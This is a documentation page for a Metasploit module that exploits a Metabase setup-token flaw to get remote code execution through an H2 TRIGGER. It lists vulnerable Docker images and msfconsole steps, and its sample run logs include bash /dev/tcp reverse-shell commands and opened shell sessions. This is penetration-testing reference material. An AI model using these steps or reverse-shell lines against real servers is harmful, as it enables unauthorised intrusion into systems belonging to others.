adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f632cf34bfef55fc2f602f620cda2aa70fb74c8d
metasploit-gs/documentation/modules/exploit/linux/http/metabase_setup_token_rce.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

2.6 KiB
Raw Blame History

Vulnerable Application

Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token is accessible even after the setup process has been completed. With this token a user is able to submit the setup functionality to create a new database. When creating a new database, an H2 database string is created with a TRIGGER that allows for code execution. We use a sample database for our connection string to prevent corrupting real databases.

Successfully tested against Metabase 0.46.6, 0.44.4, 0.42.1.

Install

Example of impacted versions:

docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.46.6
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.44.4
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.42.1

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/metabase_setup_token_rce
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should get a shell.

Options

Scenarios

Metabase 0.42.1 on Docker

msf exploit(linux/http/metabase_setup_token_rce) > run rhost=192.168.123.1 lhost=192.168.123.1 rport=3000
[*] Reloading module...

[+] bash -c '0<&30-;exec 30<>/dev/tcp/192.168.123.1/4444;sh <&30 >&30 2>&30'
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.42.1
[+] Found setup token: e02ce681-0cf7-416f-a205-75656b168b4c
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.1:58422) at 2024-10-17 09:59:25 +0100

whoami
metabase

Metabase 0.46.6 on Docker

msf > use exploit/linux/http/metabase_setup_token_rce
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
lhost => 111.111.11.111
msf exploit(linux/http/metabase_setup_token_rce) > set verbose true
verbose => true
msf exploit(linux/http/metabase_setup_token_rce) > exploit

[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
[*] Started reverse TCP handler on 111.111.11.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
[*] Sending exploit
[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000

id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
Reference in New Issue View Git Blame Copy Permalink